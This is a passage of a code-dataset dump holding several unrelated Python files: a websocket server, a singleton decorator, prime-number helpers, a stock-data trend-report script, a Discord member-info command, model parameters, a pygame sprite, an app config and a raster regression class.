SHOW_VIEW_ADD_PREFERENCE > ' + message)\n                    if data['payload']:\n                        # We received a payload -- what do we do with it now?\n                        print(f'> > {data[\"payload\"]}')\n                        for k in data['payload'].keys():\n                            self.store.set(k, data['payload'][k])\n                            print('> > > k: ' + k + ' - v: ' + data['payload'][k])\n                    response_dict = {\n                        'parent': \"content\",\n                        'id': data['id'],\n                        'html': input_temp_preference(self.store.getall())\n                    }\n                    await websocket.send(json.dumps(response_dict))\n    \"\"\"\n                elif data['func'] == 'LISTE':\n                    print('> Laden der Liste > ' + message)\n                    response_dict = {\n                        'parent': \"liste\",\n                        'id': data['id'],\n                        'html': greeting([\"Alpha\", \"Beta\", \"Gamma\"])\n                    }\n                    await websocket.send(json.dumps(response_dict))\n    \"\"\"\n    def get_dom(self):\n        return\n\n\nif __name__ == '__main__':\n    store = Store()\n    store.set('temperature', 20)\n    store.set('humidity', 45.5)\n\n    ws = Server(store)\n    asyncio.get_event_loop().run_until_complete(ws.start())\n    asyncio.get_event_loop().run_forever()","sub_path":"server/ws_s.py","file_name":"ws_s.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"356103731","text":"\"\"\"\n    Module contains a decorator which is an implementation of the singleton design pattern.\n\"\"\"\n\nfrom functools import wraps\n\n__instances = {}\n\"\"\"Dictionary of class instances created with the singleton decorator.\"\"\"\n\n\ndef singleton(cls):\n    \"\"\"Decorator for the singleton design pattern. The function decorates a class and stores its instance\n    in a dictionary of instances, from which the same instance is returned if the class is called again.\n\n    Args:\n        cls: Decorated class\n\n    Returns:\n        Instance of a decorated class\n    \"\"\"\n    @wraps(cls)\n    def get_instance(*args, **kwargs):\n        instance = __instances.get(cls, None)\n        if not instance:\n            instance = cls(*args, **kwargs)\n            __instances[cls] = instance\n        return instance\n    return get_instance\n
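\n\n# Minimal usage sketch (illustrative only; 'AppConfig' is a made-up class):\n#\n#     @singleton\n#     class AppConfig:\n#         def __init__(self, env='dev'):\n#             self.env = env\n#\n#     assert AppConfig() is AppConfig()  # the second call returns the cached instance\n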
","sub_path":"selenium_generator/base/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12690052","text":"\"\"\"Some functions that help with division and primes.\n\"\"\"\n\ndef isPrime(n):\n    \"\"\"(bool) Returns true if n is a prime integer.\"\"\"\n    if n < 2:\n        return False\n    elif n == 2:\n        return True\n    if n % 2 == 0:\n        return False\n    for x in range(3, int(n**0.5 + 1), 2):\n        if n % x == 0:\n            return False\n    return True\n\ndef Eratos(limit):\n    \"\"\"Returns a list of prime integers, where 0 < x <= limit.\n    Code based on the Sieve of Eratosthenes.\"\"\"\n    if limit < 2: return []\n    \n    primes = {}\n    for n in range(2, limit + 1): primes[n] = True\n\n    for n in primes:\n        for f in range(n*2, limit + 1, n): primes[f] = False\n    return [n for n in primes if primes[n] == True]\n\ndef invEratos(limit):\n    \"\"\"Returns a list of non-prime integers (including 1), where 0 < x <= limit.\n    Inverse of Eratos(limit).\"\"\"\n    nonprimes = [1]\n    if limit < 2: return nonprimes\n\n    primes = {}\n    for n in range(2, limit + 1): primes[n] = True\n\n    for n in primes:\n        for f in range(n*2, limit + 1, n): primes[f] = False\n    nonprimes.extend([n for n in primes if primes[n] == False])\n    return nonprimes\n\ndef primfac(n, form='l'):\n    \"\"\"Returns a list or dictionary of n's prime factors.\n\n    form='l': 'list' (DEFAULT)\n    eg. primfac(72) = [2, 2, 2, 3, 3]\n\n    form='d': 'dictionary', such that \n    prime factors : exponent of prime factor.\n    eg. primfac(90, form='d') = {2: 1, 3: 2, 5: 1}\n    Such that 90 = 2^1 * 3^2 * 5^1\"\"\"\n    if form == \"d\" or form == \"D\": factors = {}\n    else: factors = []\n\n    for div in range(2, int(n**0.5) + 2): # +1 for range(), +1 for ceil round\n        while n%div == 0:\n            if type(factors) == list:\n                factors.append(div)\n            else:\n                if div not in factors: factors[int(div)] = 1\n                else: factors[int(div)] += 1\n            n /= div\n    if n > 1:\n        if type(factors) == list:\n            factors.append(int(n))\n        else:\n            if n not in factors: factors[int(n)] = 1\n            else: factors[int(n)] += 1\n    return factors\n\ndef divnum(n):\n    \"\"\"Returns the number of integers that divide evenly into n.\"\"\"\n    product = 1\n    for item in primfac(n, form='d').values():\n        product *= (item + 1)\n    return product\n
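\n# Worked example (follows from the two functions above): 72 = 2^3 * 3^2, so\n# primfac(72) == [2, 2, 2, 3, 3], primfac(72, 'd') == {2: 3, 3: 2}, and\n# divnum(72) == (3 + 1) * (2 + 1) == 12.\n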
\ndef divisors(n, inc=True):\n    \"\"\"Returns a sorted list of integers that divide evenly\n    into n. If inc = True, divisors returns a list including n.\"\"\"\n    divs = [x for x in range(1, int(n/2) + 1) if n%x == 0]\n    if inc: divs.append(n)\n    return divs\n\ndef Collatz(n):\n    \"\"\"Returns n's Collatz sequence.\"\"\"\n    steps = [n]\n    while n > 1:\n        if n % 2 == 0: n /= 2\n        else: n = (n*3) + 1\n        steps.append(int(n))\n    return steps\n\ndef GCD(*args):\n    \"\"\"Returns the greatest common divisor of any number of numbers.\"\"\"\n    args = list(args) # *args arrives as a tuple; a list is needed for the pop/append below\n    if len(args) == 1: return args[0]\n    while len(args) > 2: #GCD(a, b, c) = GCD(a, GCD(b, c))\n        args.append(GCD(args.pop(), args.pop()))\n\n    a, b = args\n    while b != 0:\n        a, b = b, a%b\n    return a\n\ndef LCM(*args):\n    \"\"\"Returns the lowest common multiple of any number of numbers.\"\"\"\n    args = list(args) # *args arrives as a tuple; a list is needed for the pop/append below\n    if len(args) == 1: return args[0]\n    while len(args) > 2: #LCM(a, b, c) = LCM(a, LCM(b, c))\n        args.append(LCM(args.pop(), args.pop()))\n\n    a, b = args\n    return int(a*b / GCD(a, b)) #LCM(a, b) = a*b / GCD(a, b)\n","sub_path":"dwdiv.py","file_name":"dwdiv.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"517283613","text":"'''\r\nCreated on 25 Jul 2017\r\n\r\n@author: Nick\r\n'''\r\n\r\n\r\n\r\n\r\nimport sys\r\nfrom dataOperations import DataOps\r\nimport cRoutines\r\nfrom utils import getPar\r\nimport dataOperations\r\nimport itertools\r\nsys.path.append('C:\\\\Users\\\\Nick\\\\workspace\\\\git\\\\1st iteration')\r\nprint(sys.path)\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom dataCollection.dataUtils import readCSV, writeDB, readTicker, dBaseAction,\\\r\n    writeDBv2\r\nfrom _datetime import datetime\r\nfrom dataCollection.downloadData import downloadYahoo\r\nimport time\r\nimport random\r\nimport os\r\nfrom cRoutines import ewma, ewmaCovar\r\nimport gc\r\nimport utils\r\n\r\n\r\n### Full clean: run periodically (weekly?) if dividends change adjusted close back in time. 
Daily reports can use yahoo Daily clean, then full scrub on weekend?\r\nfullClean = True\r\n## Just run correlations once a week, set to Sunday = 6\r\nrunCorr = False\r\n#runCorr = datetime.today().weekday() == 6\r\n\r\nstart_time = time.time()\r\ndBase = 'C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\data\\\\PJMdataBase.db'\r\ndBase1 = 'C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\data\\\\yahooDaily-postAPIchange.db'\r\n\r\nfundementalFile = 'C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\fundementalSymbols.csv'\r\n\r\ntme = datetime.now()\r\nuniqueDates = dBaseAction(dBase1, ''' select distinct timestamp from yahooDaily ''')[0]\r\nuniqueDates1 = dBaseAction(dBase, ''' select distinct timestamp from yahooFundementals ''')[0]\r\ndates = np.unique(np.concatenate((uniqueDates,uniqueDates1))).astype('datetime64[D]')\r\ndates.sort()\r\n\r\ntickersBase = dBaseAction(dBase, ''' select * from tickers ''')[0]\r\ntickersBase1 = dBaseAction(dBase, ''' select * from tickersNew ''')[0]\r\ntickersBase = tickersBase[ ~tickersBase.ticker.isin(tickersBase1.ticker)]\r\n\r\nfundementalTicks = dBaseAction(dBase, ''' select distinct symbol from yahooFundementals ''')[0]\r\ntimeseriesTicks = dBaseAction(dBase1, ''' select distinct ticker from yahooDaily ''')[0]\r\n#cleanTicks = dBaseAction(dBase, ''' select distinct ticker from yahooDailyClean ''')[0]\r\nexchangeMap = dBaseAction(dBase, ''' SELECT * from exchangeMap ''')[0]\r\n\r\nfx = dBaseAction(dBase,''' SELECT timestamp,symbol,last_trade_price_only from yahooFundementals where symbol like \"%=%\" ''')[0]\r\nfx = fx.pivot_table(index = 'timestamp', columns = 'symbol', values = 'last_trade_price_only', aggfunc = sum )\r\nfx = fx.replace('N/A',np.nan)\r\nfxRate = fx.apply(lambda x: x[ x.index == x.last_valid_index()].astype(float)[0])\r\nfxRate = fxRate.replace(np.nan,1)\r\nfx = pd.DataFrame({'symbol':fxRate.index,\r\n                   'fx': fxRate.values})\r\nfx = fx[ fx.symbol.apply(lambda x: len(x)) == 5]\r\n## set all multi's to the same level as GBP?\r\nukEx = fx[ fx.symbol == 'GBP=X'].fx.values.astype(float)\r\nfx['ccy'] = fx.symbol.apply(lambda x: x[:3])\r\nfx.fx = 1/fx.fx.astype(float)*ukEx[0]\r\nfx = pd.concat([fx, pd.DataFrame({'ccy':'multi','symbol':'multi','fx':1.0}, index = [0])]).reset_index(drop = True)\r\n\r\ntickers = pd.concat([tickersBase[['category', 'exchange', 'name', 'ticker', 'type']].drop_duplicates().reset_index(drop = True),\\\r\n                     tickersBase1[['category', 'exchange', 'name', 'ticker', 'type']].drop_duplicates().reset_index(drop = True)]).drop_duplicates().reset_index(drop = True)\r\n\r\ntickers = tickers[tickers.type.isin(['stock', 'etf', 'index', 'mutual_fund','future','warrant','bond','currency'])]\r\ntickers = tickers.drop_duplicates().reset_index(drop = True)\r\ntickers = tickers[['category', 'exchange', 'name', 'ticker', 'type']].drop_duplicates().reset_index(drop = True)\r\ntickExchange = tickers[['ticker','exchange']].drop_duplicates().reset_index(drop = True)\r\ntickExchange = tickExchange.drop_duplicates(subset = 'ticker', keep = 'last')\r\n\r\n#ticksUse = pd.DataFrame(pd.concat([timeseriesTicks.iloc[:,0],fundementalTicks.iloc[:,0], cleanTicks.iloc[:,0], tickers.ticker]).drop_duplicates()).reset_index(drop=True)\r\nticksUse = pd.DataFrame(pd.concat([timeseriesTicks.iloc[:,0],fundementalTicks.iloc[:,0], tickers.ticker]).drop_duplicates()).reset_index(drop=True)\r\n#del( fundementalTicks,cleanTicks,uniqueDates, timeseriesTicks, tickers)\r\ndel( fundementalTicks,uniqueDates, timeseriesTicks, 
tickers)\r\ngc.collect()\r\n\r\n## Max requests from dataBase is 1000\r\nnPerSample = 1000\r\nnPerSet = 5\r\nsets = int(len(ticksUse)/(nPerSample*nPerSet))\r\n\r\ntotalSeriesYahoo = []\r\n## loop sets\r\n## for each base set, calculate stats etc, then correlations against all remaining sets. \r\n## only do corrs n:len, dont need to do prior as n vs n+1 is covered when doing n, so dont need to do when base is n+1 (except for lag i.e 1 vs lag 2, 2 vs lag 1)\r\n\r\ncleansed = []\r\nstats = []\r\nlogCrossPastUp = []\r\nlogCrossPastDown = []\r\nlogCrossPastUpClimbing = []\r\nlogClimbing = []\r\nlogMomentum = []\r\nlogCrossNowUp = []\r\nlogCrossNowDown = []\r\nlogDecelerateUp = []\r\nlogDecelerateDown = []\r\nbreakOutsUp = []\r\nbreakOutsDown = []\r\n\r\nsizeList = []\r\nkk= pd.Series(dir())\r\nfor jj in range(len(kk)):\r\n sizeList.append(pd.DataFrame({'name':kk[jj],\r\n 'size':sys.getsizeof(eval(kk[jj]))}, index = [0]))\r\n\r\npd.concat(sizeList).sort_values(by = 'size')\r\n\r\nfor i in range(int(sets+1)):\r\n totalSeriesYahoo = []\r\n closePriceData = []\r\n for j in range(nPerSet):\r\n print(str(i+1) + ' of ' + str(int(sets+1)) + ' base - ' + str(j))\r\n tickerSetFilter = ticksUse.iloc[((i*nPerSet+j)*nPerSample):(((i*nPerSet+j)*nPerSample)+min(len(ticksUse)-(i*nPerSet+j)*nPerSample,nPerSample)-1),0].reset_index(drop=True).tolist()\r\n tickerSet = ['\"' + x + '\"' for x in tickerSetFilter]\r\n tickerJoin = ' OR ticker = '.join(tickerSet)\r\n symbolJoin = ' OR symbol = '.join(tickerSet)\r\n \r\n cmd = ''' Select timestamp,symbol,name,stock_exchange,type,last_trade_price_only,open, previous_close, days_high, days_low,volume,earnings_per_share,eps_estimate_current_year,eps_estimate_next_year,eps_estimate_next_quarter,price__to__book,p_to_e_ratio,peg_ratio, price__to__eps_estimate_current_year,price__to__eps_estimate_next_year,market_capitalization, short_ratio from yahooFundementals WHERE symbol = ''' + symbolJoin + ''' '''\r\n closePriceData.append(dBaseAction(dBase, cmd)[0])\r\n \r\n if not fullClean:\r\n try:\r\n cmds = [''' SELECT * from \"yahooDailyClean\" WHERE ticker = ''' + tickerJoin + ''' ''']\r\n timeSeries = dBaseAction(dBase = dBase, readSQL=cmds)[0]\r\n dateFrom = min([timeSeries.timestamp[ timeSeries.ticker == x].max() for x in timeSeries.ticker.unique()])\r\n cleanTicks = timeSeries.ticker.unique()\r\n tickerSet = ['\"' + x + '\"' for x in cleanTicks]\r\n tickerJoin = ' OR ticker = '.join(tickerSet)\r\n cmds = [''' SELECT * from \"yahooDaily\" WHERE ticker = ''' + tickerJoin + ''' ''']\r\n timeSeriesExtra = dBaseAction(dBase = dBase, readSQL=cmds)[0] \r\n timeSeriesExtra = timeSeriesExtra[ timeSeriesExtra.timestamp.astype('datetime64[D]') > np.datetime64(dateFrom)]\r\n missingTicks = np.array(tickerSetFilter)[ ~np.in1d(tickerSetFilter,timeSeries.ticker)].tolist()\r\n tickerSet = ['\"' + x + '\"' for x in missingTicks]\r\n tickerJoin = ' OR ticker = '.join(tickerSet)\r\n except:\r\n timeSeriesExtra = pd.DataFrame()\r\n timeSeries = pd.DataFrame()\r\n \r\n else:\r\n timeSeriesExtra = pd.DataFrame()\r\n cmds = [''' SELECT * from \"yahooDaily\" WHERE ticker = ''' + tickerJoin + ''' ''']\r\n timeSeries = dBaseAction(dBase = dBase1, readSQL=cmds)[0]\r\n \r\n timeSeries = pd.concat([timeSeries, timeSeriesExtra]).reset_index(drop = True) \r\n totalSeriesYahoo.append(timeSeries)\r\n \r\n closePriceData = pd.concat(closePriceData).reset_index(drop =True)\r\n closePriceData = closePriceData[ (closePriceData.last_trade_price_only != 'N/A') & 
closePriceData.symbol.isin(ticksUse.iloc[:,0].tolist())].reset_index(drop = True)\r\n closePriceData = closePriceData.replace('N/A',np.nan)\r\n closePriceData[closePriceData.columns[~closePriceData.columns.isin(['timestamp','symbol','name','stock_exchange', 'type'])]] = \\\r\n closePriceData[closePriceData.columns[~closePriceData.columns.isin(['timestamp','symbol','name', 'stock_exchange', 'type'])]].astype(float)\r\n closePriceData.timestamp = closePriceData.timestamp.astype('datetime64[D]')\r\n closePriceData = closePriceData.rename(columns = {'days_high':'high','days_low':'low','previous_close':'close','last_trade_price_only':'adj_close'})\r\n\r\n base = pd.concat(totalSeriesYahoo).reset_index(drop = True)\r\n if (base.shape[0] == 0) | (base.ticker.unique().shape[0] > 1):\r\n continue\r\n else:\r\n logi = i\r\n \r\n try:\r\n base = base.replace({None:np.nan,'N/A':np.nan}, regex = True)\r\n base[['adj_close','close','high','low','open','volume']] = base[['adj_close','close','high','low','open','volume']].astype(float)\r\n except:\r\n pass\r\n base = base[~(base.timestamp.astype(str).str.contains('b'))]\r\n base = base[ ~np.isnan(base.adj_close) ].reset_index(drop = True)\r\n base = base.drop_duplicates().reset_index(drop = True)\r\n base.timestamp = base.timestamp.astype('datetime64[D]')\r\n base = base.drop(['ID'], axis = 1)\r\n del(totalSeriesYahoo,timeSeries,timeSeriesExtra)\r\n #baseMerge = pd.merge(base, uniqueDates, left_on = 'timestamp', right_on = 'timestamp')\r\n \r\n colList = ['adj_close']\r\n for col in colList:\r\n print(col)\r\n cutDates = True if col == 'adj_close' else False\r\n basePivot = base.pivot_table(index = 'timestamp', columns = 'ticker', values = col, aggfunc = sum)\r\n \r\n ## cleanData\r\n ## Note when we clean and append the data from the daily fundementals, if tbe high or low or whatever is nan in the fundemental data for particular \r\n ## tickers, these will be dropped from the clean set, however these will persist in the trend following if the adj_close data is ok.\r\n \r\n baseClean = DataOps(timeSeriesData = basePivot)\r\n baseCleanMelt,_ = baseClean.cleanseTimeSeries(fundementalPrices = closePriceData[closePriceData.symbol.isin(basePivot.columns) ], fundColName = col, \\\r\n cutMissingDates = cutDates,dates = dates, cores = 4)\r\n if col == 'adj_close':\r\n volPivot = base.pivot_table(index = 'timestamp', columns = 'ticker', values = 'volume', aggfunc = sum)\r\n volClean = DataOps(timeSeriesData = volPivot[ baseCleanMelt.columns])\r\n volsCleanMelt,_ = volClean.cleanseTimeSeries(fundementalPrices = closePriceData[closePriceData.symbol.isin(volPivot.columns) ], fundColName = 'volume', \r\n justFill = True,dates = dates)\r\n volsCleanMeltDF = volsCleanMelt.copy()\r\n volsCleanMeltDF.reset_index(inplace = True)\r\n volsCleanMeltDF = volsCleanMeltDF.rename(columns = {'index':'timestamp'})\r\n volsCleanMeltDF = pd.melt(volsCleanMeltDF, id_vars = ['timestamp'])\r\n volsCleanMeltDF = volsCleanMeltDF.rename(columns = {'value':'volume'})\r\n \r\n baseCleanDF = baseCleanMelt.copy()\r\n volCleanDF = volsCleanMelt.copy()\r\n \r\n del(baseCleanMelt, baseClean, basePivot, volClean, volsCleanMelt, volPivot, volsCleanMeltDF)\r\n gc.collect()\r\n \r\n '''############### get returns and stats ################'''\r\n \r\n baseClean = DataOps(timeSeriesData = baseCleanDF, volData = volCleanDF)\r\n #baseClean.getStats()\r\n #stats.append(baseClean.statsReport)\r\n tickExchangeMap = pd.merge(pd.DataFrame({'ticker':baseClean.timeSeriesData.columns}), tickExchange, on = 
'ticker')\r\n tickExchangeMap = pd.merge(tickExchangeMap, exchangeMap[['yahoo_exchange','ccy','level']], left_on = 'exchange', right_on = 'yahoo_exchange')\r\n ##adjust ccy for ccy pairs not in USD\r\n tickExchangeMap.ccy[ tickExchangeMap.ticker.str.contains('=X') & (tickExchangeMap.ticker.str.len() > 5)] = \\\r\n tickExchangeMap[ tickExchangeMap.ticker.str.contains('=X') & (tickExchangeMap.ticker.str.len() > 5)].ticker.str[3:6].values\r\n tickExchangeMap = pd.merge(tickExchangeMap, fx[['ccy','fx']], left_on = 'ccy', right_on = 'ccy')\r\n \r\n ## need to add ccy timeSeries exchanges to data as they are not in exchangeMap\r\n ccys = pd.DataFrame({'ticker':baseClean.timeSeriesData.columns})[ pd.DataFrame({'ticker':baseClean.timeSeriesData.columns}).ticker.str.contains('=')]\r\n appendCcys = pd.DataFrame({'ticker':ccys.ticker,\r\n 'exchange':ccys.ticker,\r\n 'yahoo_exchange':ccys.ticker,\r\n 'level':1,\r\n 'ccy':'ccy'}).reset_index(drop = True)\r\n ## long ccys have to stay as they are as we want to see patterns of different ccys against eachother - filter them into a different report?\r\n longCcy = np.where(appendCcys.ticker.str.len() == 8)[0]\r\n shortCcy = np.where(appendCcys.ticker.str.len() == 5)[0]\r\n appendCcys['fx'] = 1\r\n appendCcys['fx'][shortCcy] = fx.fx[ fx.symbol.isin(appendCcys.ticker[shortCcy.tolist()])]\r\n appendCcys['ccy'][shortCcy] = 'GBP'\r\n tickExchangeMap = pd.concat([tickExchangeMap, appendCcys]) .reset_index(drop = True)\r\n tickExchangeMap = \\\r\n tickExchangeMap.drop_duplicates('ticker').reset_index(drop = True)\r\n if baseClean.timeSeriesData.shape[1] > 1:\r\n baseClean.getWaveRider(tickExchangeMap = tickExchangeMap)\r\n \r\n closePriceData = closePriceData[ closePriceData.timestamp == closePriceData.timestamp.max()][['symbol','volume','earnings_per_share','eps_estimate_current_year','eps_estimate_next_year','eps_estimate_next_quarter','price__to__book','p_to_e_ratio','peg_ratio','price__to__eps_estimate_current_year','price__to__eps_estimate_next_year','market_capitalization','short_ratio','average_daily_volume']]\r\n upReport = pd.merge(baseClean.logCrossPastUp,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n downReport = pd.merge(baseClean.logCrossPastDown,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n \r\n \r\n closePriceData = closePriceData[ closePriceData.timestamp == closePriceData.timestamp.max()][['symbol','volume','market_capitalization','short_ratio','average_daily_volume']]\r\n climbReport = pd.merge(baseClean.logClimbing, base[['ticker','type']].drop_duplicates(), on = ['ticker']).reset_index(drop = True)\r\n climbReport = pd.merge(climbReport,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n momentum = pd.merge(baseClean.momentum, base[['ticker','type']].drop_duplicates(), on = ['ticker']).reset_index(drop = True)\r\n momentum = pd.merge(momentum,closePriceData, left_on = 'ticker', right_on = 'symbol')\r\n\r\n \r\n \r\n climbReportCross = pd.merge(baseClean.logCrossPastUpClimbing, base[['ticker','type']].drop_duplicates(), on = ['ticker']).reset_index(drop = True)\r\n #upReport = pd.merge(upReport,base, left_on = 'ticker', right_on = 'ticker')\r\n #downReport = pd.merge(downReport,base, left_on = 'ticker', right_on = 'ticker')\r\n \r\n \r\n logCrossPastUp.append(upReport)\r\n logCrossPastDown.append(downReport)\r\n logCrossPastUpClimbing.append(climbReportCross)\r\n logClimbing.append(climbReport)\r\n logMomentum.append(momentum)\r\n logCrossNowUp.append(baseClean.logCrossNowUp)\r\n 
logCrossNowDown.append(baseClean.logCrossNowDown)\r\n logDecelerateUp.append(baseClean.logDecelerateUp)\r\n logDecelerateDown.append(baseClean.logDecelerateDown)\r\n breakOutsUp.append(baseClean.breakOutReportUp)\r\n breakOutsDown.append(baseClean.breakOutReportDown)\r\n \r\n del(baseClean)\r\n gc.collect()\r\n\r\n\r\nlogCrossPastUp = pd.concat(logCrossPastUp).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateCrossPastUp_' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nlogCrossPastDown = pd.concat(logCrossPastDown).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateCrossPastDown_' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nlogCrossPastUpClimbing = pd.concat(logCrossPastUpClimbing).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateCrossPastUpClimbing' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nlogClimbing = pd.concat(logClimbing).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateClimbing' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\nmomentum = pd.concat(logMomentum).reset_index(drop = True).to_csv('C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\Incubator\\\\IncubateMomentum' + str(np.datetime64(datetime.now().date())).replace('-','') + '.csv', sep =',')\r\n \r\n ","sub_path":"1st iteration/Archive/Incubate.py","file_name":"Incubate.py","file_ext":"py","file_size_in_byte":17140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"377643653","text":"import discord\n\nfrom discord.ext import commands\n\nclass utility(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def joined(self, ctx, member : str):\n \"\"\"Says when a member joined.\"\"\"\n if str(ctx.message.author.id) != '194972515460710400':\n return\n\n if len(member) > 20:\n await ctx.send('Invalid ID.')\n return\n try:\n member_obj = await commands.MemberConverter().convert(ctx, member)\n except:\n await ctx.send('User not found.')\n return\n\n icon_url = member_obj.avatar_url_as()\n e = discord.Embed(type='rich', title='User Details', color=int('e6ffff', 16))\n e.set_thumbnail(url=icon_url)\n e.add_field(name='Name', value=str(member_obj))\n e.add_field(name='ID', value=member_obj.id)\n e.add_field(name='Nickname', value=member_obj.nick)\n e.add_field(name='Date Joined', value=member_obj.joined_at.strftime(\"%c\"))\n s = ', '.join([role.name for role in member_obj.roles[1:]])\n e.add_field(name='Roles', value=s)\n\n await ctx.send(embed=e)\n\ndef setup(bot):\n bot.add_cog(utility(bot))\n\n\n\n","sub_path":"cogs/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22578268","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nclass paramsClass:\n def __init__(self):\n return\n \nperformanceParams = paramsClass()\neconomicParams = paramsClass()\nsysParams = paramsClass()\n\neconomicParams.k=0.001\neconomicParams.dDecay=2.\neconomicParams.dScale=5\neconomicParams.g=0.04\neconomicParams.A=1\neconomicParams.u=1.\neconomicParams.a=0.95\neconomicParams.b=0.9\neconomicParams.t1=1.\neconomicParams.t2=np.inf\neconomicParams.citySize = 
10.\n\neconomicParams.balancedTheta = (1-economicParams.a)/(1-economicParams.a*economicParams.b)\n\nperformanceParams.steps = 1000\n\ndef initZ():\n return np.linspace(200,0,performanceParams.steps)\n #return np.linspace(200,0,performanceParams.steps)\n\nperformanceParams.initialZ = initZ\n\nsysParams.outpath = \"..\\\\..\\\\outsg\" #\"d:\\\\UrbanModels\\\\outsg\"\nsysParams.zpath = \"..\\\\zs\"","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"156875100","text":"import pygame\nfrom pygame.locals import *\nimport random\n\n\nclass Enemy(pygame.sprite.Sprite):\n enemy_image = None\n\n def __init__(self):\n super(Enemy, self).__init__()\n if Enemy.enemy_image == None:\n Enemy.enemy_image = pygame.image.load(\n 'assets/missile.png').convert()\n Enemy.enemy_image.set_colorkey((255, 255, 255), RLEACCEL)\n self.image = Enemy.enemy_image\n self.rect = self.image.get_rect(\n center=(random.randint(820, 900), random.randint(0, 600)))\n self.speed = random.randint(4, 8)\n\n def update(self):\n self.rect.move_ip(-self.speed, 0)\n if self.rect.right < 0:\n self.kill()\n","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"89828376","text":"import os\n\n\nclass Config(object):\n SECRET_KEY = os.environ.get('SECRET_KEY') or \"you will never guess\"\n\nhost = os.getenv('HOST')\nport = os.getenv('PORT')\nswagger_url = os.getenv('SWAGGER_URL') or \"http://addressindex-api-beta.apps.devtest.onsclofo.uk/assets/swagger.json\"\napi_url = os.getenv('API_URL') or \"http://addressindex-api-beta.apps.devtest.onsclofo.uk\"\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"115921361","text":"from osgeo import ogr\nimport gdal\nimport numpy as np\nimport pandas as pd\nimport sklearn.linear_model as sk\n\nclass RegMapper():\n def __init__(self, sampled_points, rasters):\n self.shapefile_path = sampled_points\n self.regression_list = list()\n self.raster_list = rasters\n self.array_list = []\n self.CreateRegressionList(self.raster_list)\n def NumRasters(self):\n return (len(self.raster_list))\n def AddRasters(self, rasters):\n self.raster_list.append(rasters)\n return 0\n def SetRSquare(self,R):\n self.RS = R\n def GetRSquared(self):\n return self.RS\n def SetCoef(self,coef):\n self.coef = coef\n def GetCoef(self):\n return self.coef\n def SetIntercept(self,intercept):\n self.intercept = intercept\n def GetIntercept(self):\n return self.intercept\n def GetRegressionList(self):\n return self.regression_list\n def GetRasterList(self):\n return self.raster_list\n def ExtractPointValue(self, raster, x, y):\n raster_open = gdal.Open(raster)\n raster_array = raster_open.ReadAsArray().astype(np.float)\n transform = raster_open.GetGeoTransform()\n transform_inverse = gdal.InvGeoTransform(transform)\n transformed_points = gdal.ApplyGeoTransform(transform_inverse, float(x), float(y))\n x_int = int(transformed_points[0])\n y_int = int(transformed_points[1])\n raster_open = None\n return raster_array[y_int, x_int]\n\n def CreateRegressionList(self, rasters):\n id_cnt = 0\n shapefile_driver = ogr.GetDriverByName(\"ESRI Shapefile\")\n shapefile_sample = self.shapefile_path\n sample_source = 
shapefile_driver.Open(shapefile_sample, 1)\n sample_layer = sample_source.GetLayer()\n testlist = list()\n for feature in sample_layer:\n testlist.append(feature)\n for feature in testlist:\n raster_vals = []\n geom_sample = feature.GetGeometryRef()\n geomstr = str(geom_sample)\n geom_xy_str = geomstr[7:-1]\n geom_xy = geom_xy_str.split()\n sample_value = int(feature.GetField(\"value_\"))\n for i in rasters:\n val = self.ExtractPointValue(i, geom_xy[0], geom_xy[1])\n raster_vals.append(val)\n sample_vals = [int(id_cnt), geom_sample, float(geom_xy[0]), float(geom_xy[1]),\n sample_value]\n for i in range(len(rasters)):\n sample_vals.append(raster_vals[i])\n self.regression_list.append(sample_vals)\n id_cnt += 1\n\n def PerformRegression(self):\n import regression\n self.lm = sk.LinearRegression()\n raster_num = 0\n combined_list = []\n self.array_queue_list = []\n for i in self.regression_list:\n raster_value_list = list()\n for z in i[4:]:\n raster_value_list.append(z)\n combined_list.append(raster_value_list)\n regression_array = np.zeros(shape=(len(self.regression_list), len(combined_list[0])))\n for i in range(len(combined_list)):\n regression_array[i] = combined_list[i]\n len_array = []\n for i in range(len(combined_list[0])-1):\n len_array.append(i+1)\n self.final_list = regression_array\n self.lm.fit(\n 